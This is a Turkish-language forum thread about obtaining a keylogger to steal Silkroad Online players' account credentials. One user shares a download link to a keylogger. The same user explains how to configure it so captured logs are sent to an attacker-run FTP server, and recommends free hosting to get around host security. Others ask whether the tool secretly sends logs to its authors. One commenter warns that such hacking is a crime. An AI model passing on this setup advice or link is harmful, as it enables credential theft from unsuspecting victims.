Dandik Keyloger Aranıyor!
-
silkroad oyunu için virüs programlarına yakalananlardanda olan keyloger arıyorm
-
rapidhacker550 bunu yazdı:
-----------------------------
silkroad oyunu için virüs programlarına yakalananlardanda olan keyloger arıyorm
-----------------------------yakalanmayanını bulursan bana da haber ver :D
-
alihan getiriyo bekle =)
-
ben kullanıyorum bi tane yakalanır anti virüse ama sağlamda log verir logları hosting e geliyo free bi tane host al programa ftp.ornek.com diye gir :D sonra kullanıcı adını yaz şifreni yaz log gelme süresi falan yap loglar hosting e gelir ben kullanıyorum geliyo gelmiyo falan :D deme hiç :D
http://rapidshare.com/files/226103443/drklogger_pcname_.rar.html
not: free host kullanmıyorum benim hostum var diyosan hostlarda secutary diye bi dosya oluyo o engelliyo free kullanmanı tavsiye ederim iyi şanslar :)
-
whatanlar bunu yazdı:
-----------------------------
alihan getiriyo bekle =)
-----------------------------
getirdim başkan en dandiğinden :D problem yok :D -
neden yakalanan
-
hocam bu tür keyloggerlar google.com da oldukça fazla mevcutta ben başka 1 mevzuya deyinicem.
online oyunlarda keylogger yoluyla hacking v.s artık hapis cezasi biliyosundur.
yani logu yiyen velet gidip bilişim suçlarına şikayet edip hayatını karartabilir,yakalanan keylogger bu iş için biçilmiş kaftan :D
-
helyum_pasha bunu yazdı:
-----------------------------ben kullanıyorum bi tane yakalanır anti virüse ama sağlamda log verir logları hosting e geliyo free bi tane host al programa ftp.ornek.com diye gir :D sonra kullanıcı adını yaz şifreni yaz log gelme süresi falan yap loglar hosting e gelir ben kullanıyorum geliyo gelmiyo falan :D deme hiç :D
http://rapidshare.com/files/226103443/drklogger_pcname_.rar.html
not: free host kullanmıyorum benim hostum var diyosan hostlarda secutary diye bi dosya oluyo o engelliyo free kullanmanı tavsiye ederim iyi şanslar :)
-----------------------------Hacı bu keyLoggerda ftp adresLeryLe oLuşturduumuz server açıldığında LogLar vs. sadece "bizim" ftp'yemi gidior yoksa keyLogger'ı kodLayanLara da gidiyor mu ?
Bi yamuk yok değiL mi ??
-
-----------------------------
Hacı bu keyLoggerda ftp adresLeryLe oLuşturduumuz server açıldığında LogLar vs. sadece "bizim" ftp'yemi gidior yoksa keyLogger'ı kodLayanLara da gidiyor mu ?
Bi yamuk yok değiL mi ??
-----------------------------valla hocam hiç bi bilgim yok ama bi yamukta görmedim host şifrem bile çalınmadı kullanmana bak :)
sadece ftp ye geliyor :D gerisi daha nereye gidiyo bilmiyorum sanmam ama :D yani bi yamuk görmedim :D -
helyum_pasha bunu yazdı:
-----------------------------
-----------------------------Hacı bu keyLoggerda ftp adresLeryLe oLuşturduumuz server açıldığında LogLar vs. sadece "bizim" ftp'yemi gidior yoksa keyLogger'ı kodLayanLara da gidiyor mu ?
Bi yamuk yok değiL mi ??
-----------------------------valla hocam hiç bi bilgim yok ama bi yamukta görmedim host şifrem bile çalınmadı kullanmana bak :)
sadece ftp ye geliyor :D gerisi daha nereye gidiyo bilmiyorum sanmam ama :D yani bi yamuk görmedim :D
-----------------------------Ben koooca sunucunun şifresini girmiştim :)
